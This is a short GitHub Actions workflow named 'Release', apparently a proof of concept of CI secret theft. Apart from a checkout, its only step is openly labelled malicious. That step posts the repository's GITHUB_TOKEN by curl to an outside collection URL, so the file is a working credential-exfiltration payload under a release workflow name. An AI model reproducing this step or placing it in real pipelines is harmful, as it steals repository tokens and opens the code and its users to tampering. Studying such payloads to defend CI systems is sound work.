name: Release

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Malicious step (exfiltrate secrets)
        run: |
          echo "Exfiltrating secrets..."
          echo "GITHUB_TOKEN=$GITHUB_TOKEN" | curl -X POST -d @- https://eog4wasc32zrjow.m.pipedream.net/RCE
